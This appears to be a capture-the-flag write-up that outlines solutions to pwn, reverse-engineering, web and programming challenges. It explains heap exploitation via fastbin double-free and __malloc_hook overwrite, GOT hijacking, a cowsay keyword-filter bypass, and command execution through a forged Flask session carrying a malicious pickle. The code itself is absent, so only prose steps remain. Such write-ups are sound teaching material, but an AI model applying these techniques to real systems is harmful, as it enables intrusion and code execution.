links:
Shellcode Master
mprotect
-ed to --x
as soon as the first payload is read.The key idea is, do not focus on the shellcode area, but the stack. You are even not able to call
any subprocess without a stack.
If we manage to rebuild a stack at any static address, and manually form an ROP-like shellcode, it might be able to reuse the shellcode many times, which probably let us call read()
again to place a rich payload.
After some ramdom trial, I successfully made a reuseable shellcode, which setup a basic read()
syscall:
The remaining steps:
read()
several times to place ROP payloads;mprotect()
the shellcode area to be rwx
;read()
to write the final shellcode to the rwx
landing pad.EXP (partial):
p.s. There is indeed a short 22 bytes shellcode, but it's totally unrelated. Don't be trapped!
FastNote
0x80+0x10
) unsorted bin
(for leakage of libc base address).tcaches
to put a chunk into unsorted bin
.tcaches
to do a fastbin
double-free;fastbin
double-free will put two same chunk into fastbin
lists.malloc()
to drain tcache
list;malloc()
to drain fastbin
list. Since the victim chunk has been allocated and filled with data before allocating it again, its content will be confused with the freed-chunk layout, where the fd
is overlapped with our user data.malloc()
is trying to allocate chunks from fastbin
lists, the remainigs will be stashed into tcache
list, where it lacks validation thus arbitary address can be treated as a chunk and returned.OldFastNote
Very similar to fast note
challange, except the program was built with old glibc2.23
.
tcaches
, the fastbins
and unsorted bins
can be directly used.fastbins
in malloc()
Take a look around the __malloc_hook
:
We can see that it's possible to treat these 8 bytes as u64(0x7f)
and place a 0x7*
sized fastbin
chunk here to cover the __malloc_hook
.
In order to pick the chunk into correct slot of fastbins
, the "chunk forger" i.e. the previous legal chunks must be in same size category. Thus the size of the requiring notes should be 0x60 (+0x10)
.
At the pause point we can see the forged chunk has got a valid size and linked to the legal chunk going to be allocated. The mask bits won't be check during allocating from fastbins, so the chunk is returned as expected.
And the last thing worth mentioning is the one gadget
.
Break at where the one gadget
being executed and test these constraints, it turns that $rsp+0x50
and $rsp+0x70
are likely to be same and probably be 0. So just take the latter 2 gadgets.
EldenRingII
An even easier version of fast note
. There are add
/ delete
/ edit
/ show
4 functions, and still a UAF which enables to write any data to the freed chunks.
As it shows the program is statically mapped and the got.plt
is writable. So the exploitation can be very simplified to:
fastbin
double-free to construct a chunk covering the static notes
variables.notes
pointerShowing
/ Editing
the content of notes
being modified.DynELF
finish the job. We can hijack any entry of got.plt
to execute the getshell gadget.ezCPP
cpp
, just a boring TEA
-like cipher.babyRE
Xor
each key byte by 0x11
:
The author put a little trap in this snippet. Don't you doubt that what's the purpose at all of setting a strange signal handler? Signumber 8 stands for SIGFPE
, which is alarmed when a Float Point Exception occurs.
Okay then… where does the float point come from?
Check the disassembly, we see that there is a trap hidden from the decompilation.
On the stackoverflow
people had explained the FPE
and div-by-zero stuff. In a word SIGFPE
is raised whenever meeting arithmetic faults. So the Xor
loop only executes 3 times, leaving the key "wtxfei"
.
Obviously the cipher bytes are generated sequentially and entangled with the near byte. So the plain flag should be recovered from the tail.
Arithmetic
*SP law
discussed in the previous contestThe main()
function:
There are some strange indecies/offsets in my decompilation. Let's take a look at the attachment file, it will be much clearer:
This is a text file containing 500 lines, and each line has a searies of numbers. The program read the whole file and randomly generate a path that goes top-down. And the accumulater sums up all the travelled number to see if greater than 6752833
. If so, print the flag hint.
So our goal should be find out the way getting the max sum, and the flag will be the md5 hash of the path sequence.
Obviously this is a DP problem. The max sum at each number's position is uniquely determined. And it only depends on 2 variables: the sum from above and the sum from upper left (and the number itself, of course).
So we can solve the promblem by traversing every number, record the max sum and the path whether the sum comes from left or above. After then we take the max sum from the last row, and its path should be the answer.
More Courses
Yet another brute-force-request challenge:
/api/select
/api/expand
):
COW
Yet another cowsay challege.
Some keywords are filtered:
Easily bypass it by taking advantage of printf
myFlask
2 examine points.
The SECKEY used to sign the session is a time-based string, and it's fixed since the server has started:
Since it doesn't change, it's easy to brute-force it by mocking the flask session:
The flag can be retrieved by the send_file() route:
We can make an evil pickle to execute a system command that cat
the flag into app.py
, and access /
to get the result. Attention that the server automatically reloads when the source file changes, so the SECKEY need to be cracked again each time after executing the "write-to-file" command.
华容道
A programming challenge about the "Klotski", a.k.a the「华容道」 puzzle.
The game server sets a very severe restriction that requrires solving 11 rounds of the puzzle (up to 180 steps!) in 10 seconds. This is very hard for python to follow up. I realized that long after finishing the algorithm, at the moment the code had been filled with nested functions and exceptions. So I didn't want to port the algorighm to other languages.
I finally managed to speed up by caching all solutions found previously, and burn up the CPU to generate as much as possible solutions with multiprocessing.
Eventually the challenge was won by 280+ pre-calculated solutions.
The solver script is hosted on gist.
I mean, the numpy ndarray
or any other "more human-friendly" data types / abstracitons. They lack so much of optimization that over 60% CPU time was wasted on type conversions and data recompositions. The builtinlistcomp
method ate about 20% CPU time, which was really ridiculous.
That's the real lesson I learnt from this challenge.